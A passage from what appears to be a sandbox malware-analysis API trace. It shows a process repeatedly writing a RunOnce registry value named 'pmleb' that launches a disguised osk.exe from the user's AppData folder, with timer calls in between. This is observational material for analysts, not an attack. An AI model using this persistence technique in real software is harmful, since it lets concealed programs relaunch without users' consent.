phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.765] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.765] RegCloseKey (hKey=0x280) returned 0x0 [0092.765] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.765] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.765] SetTimer (hWnd=0x20280, nIDEvent=0x2212, uElapse=0xa, lpTimerFunc=0x0) returned 0x2212 [0092.765] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.779] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.779] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.779] KillTimer (hWnd=0x20280, uIDEvent=0x2212) returned 1 [0092.779] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.780] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.780] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.780] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.780] RegCloseKey (hKey=0x280) returned 0x0 [0092.780] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.781] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.781] SetTimer (hWnd=0x20280, nIDEvent=0x2213, uElapse=0xa, lpTimerFunc=0x0) returned 0x2213 [0092.781] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.794] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.794] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.795] KillTimer (hWnd=0x20280, uIDEvent=0x2213) returned 1 [0092.795] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.795] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.796] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.796] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.796] RegCloseKey (hKey=0x280) returned 0x0 [0092.796] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.796] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.796] SetTimer (hWnd=0x20280, nIDEvent=0x2214, uElapse=0xa, lpTimerFunc=0x0) returned 0x2214 [0092.796] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.818] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.818] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.819] KillTimer (hWnd=0x20280, uIDEvent=0x2214) returned 1 [0092.820] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.820] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.820] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.820] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.820] RegCloseKey (hKey=0x280) returned 0x0 [0092.820] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.821] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.821] SetTimer (hWnd=0x20280, nIDEvent=0x2215, uElapse=0xa, lpTimerFunc=0x0) returned 0x2215 [0092.821] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.825] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.825] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.826] KillTimer (hWnd=0x20280, uIDEvent=0x2215) returned 1 [0092.826] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.826] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.826] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.827] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.827] RegCloseKey (hKey=0x280) returned 0x0 [0092.827] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.827] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.827] SetTimer (hWnd=0x20280, nIDEvent=0x2216, uElapse=0xa, lpTimerFunc=0x0) returned 0x2216 [0092.827] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.841] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.841] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.841] KillTimer (hWnd=0x20280, uIDEvent=0x2216) returned 1 [0092.842] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.842] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.842] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.843] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.843] RegCloseKey (hKey=0x280) returned 0x0 [0092.843] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.843] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.843] SetTimer (hWnd=0x20280, nIDEvent=0x2217, uElapse=0xa, lpTimerFunc=0x0) returned 0x2217 [0092.843] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.857] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.857] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.857] KillTimer (hWnd=0x20280, uIDEvent=0x2217) returned 1 [0092.857] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.858] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.858] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.858] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.858] RegCloseKey (hKey=0x280) returned 0x0 [0092.858] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.858] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.859] SetTimer (hWnd=0x20280, nIDEvent=0x2218, uElapse=0xa, lpTimerFunc=0x0) returned 0x2218 [0092.859] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.872] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.872] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.872] KillTimer (hWnd=0x20280, uIDEvent=0x2218) returned 1 [0092.873] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.873] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.873] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.874] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.874] RegCloseKey (hKey=0x280) returned 0x0 [0092.874] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.874] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.874] SetTimer (hWnd=0x20280, nIDEvent=0x2219, uElapse=0xa, lpTimerFunc=0x0) returned 0x2219 [0092.874] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.888] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.888] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.888] KillTimer (hWnd=0x20280, uIDEvent=0x2219) returned 1 [0092.888] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.889] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.889] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.889] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.889] RegCloseKey (hKey=0x280) returned 0x0 [0092.889] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.890] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.890] SetTimer (hWnd=0x20280, nIDEvent=0x221a, uElapse=0xa, lpTimerFunc=0x0) returned 0x221a [0092.890] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.903] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.903] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.904] KillTimer (hWnd=0x20280, uIDEvent=0x221a) returned 1 [0092.904] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.904] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.904] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.905] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.905] RegCloseKey (hKey=0x280) returned 0x0 [0092.905] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.905] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.905] SetTimer (hWnd=0x20280, nIDEvent=0x221b, uElapse=0xa, lpTimerFunc=0x0) returned 0x221b [0092.905] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.919] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.919] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.919] KillTimer (hWnd=0x20280, uIDEvent=0x221b) returned 1 [0092.920] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.920] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.920] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.920] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.921] RegCloseKey (hKey=0x280) returned 0x0 [0092.921] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.921] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.921] SetTimer (hWnd=0x20280, nIDEvent=0x221c, uElapse=0xa, lpTimerFunc=0x0) returned 0x221c [0092.921] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.935] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.935] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.935] KillTimer (hWnd=0x20280, uIDEvent=0x221c) returned 1 [0092.935] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.936] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.936] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.936] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.936] RegCloseKey (hKey=0x280) returned 0x0 [0092.936] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.936] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.936] SetTimer (hWnd=0x20280, nIDEvent=0x221d, uElapse=0xa, lpTimerFunc=0x0) returned 0x221d [0092.936] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.950] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.950] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.950] KillTimer (hWnd=0x20280, uIDEvent=0x221d) returned 1 [0092.951] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.951] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.951] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.951] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.952] RegCloseKey (hKey=0x280) returned 0x0 [0092.952] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.952] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.952] SetTimer (hWnd=0x20280, nIDEvent=0x221e, uElapse=0xa, lpTimerFunc=0x0) returned 0x221e [0092.952] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.968] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.968] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.968] KillTimer (hWnd=0x20280, uIDEvent=0x221e) returned 1 [0092.969] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.969] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.969] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.969] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.970] RegCloseKey (hKey=0x280) returned 0x0 [0092.970] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.970] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.970] SetTimer (hWnd=0x20280, nIDEvent=0x221f, uElapse=0xa, lpTimerFunc=0x0) returned 0x221f [0092.970] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.981] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.981] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.982] KillTimer (hWnd=0x20280, uIDEvent=0x221f) returned 1 [0092.982] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.982] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.982] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.983] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.983] RegCloseKey (hKey=0x280) returned 0x0 [0092.983] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.983] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.983] SetTimer (hWnd=0x20280, nIDEvent=0x2220, uElapse=0xa, lpTimerFunc=0x0) returned 0x2220 [0092.983] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.997] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.997] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.997] KillTimer (hWnd=0x20280, uIDEvent=0x2220) returned 1 [0092.997] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.998] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.998] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.998] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.998] RegCloseKey (hKey=0x280) returned 0x0 [0092.998] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.998] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.998] SetTimer (hWnd=0x20280, nIDEvent=0x2221, uElapse=0xa, lpTimerFunc=0x0) returned 0x2221 [0092.999] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.013] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.013] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.013] KillTimer (hWnd=0x20280, uIDEvent=0x2221) returned 1 [0093.013] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.013] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.013] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.014] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.014] RegCloseKey (hKey=0x280) returned 0x0 [0093.014] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.014] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.014] SetTimer (hWnd=0x20280, nIDEvent=0x2222, uElapse=0xa, lpTimerFunc=0x0) returned 0x2222 [0093.014] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.028] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.028] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.028] KillTimer (hWnd=0x20280, uIDEvent=0x2222) returned 1 [0093.029] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.029] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.029] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.029] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.030] RegCloseKey (hKey=0x280) returned 0x0 [0093.030] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.030] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.030] SetTimer (hWnd=0x20280, nIDEvent=0x2223, uElapse=0xa, lpTimerFunc=0x0) returned 0x2223 [0093.030] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0093.044] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0093.044] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0093.044] KillTimer (hWnd=0x20280, uIDEvent=0x2223) returned 1 [0093.044] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.045] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0093.045] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0093.045] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0093.045] RegCloseKey (hKey=0x280) returned 0x0 [0093.045] IUnknown:Release (This=0x7a9740) returned 0x1 [0093.045] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0093.045] SetTimer (hWnd=0x20280, nIDEvent=0x2224, uElapse=0xa, lpTimerFunc=0x0) returned 0x2224 [0093.046] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 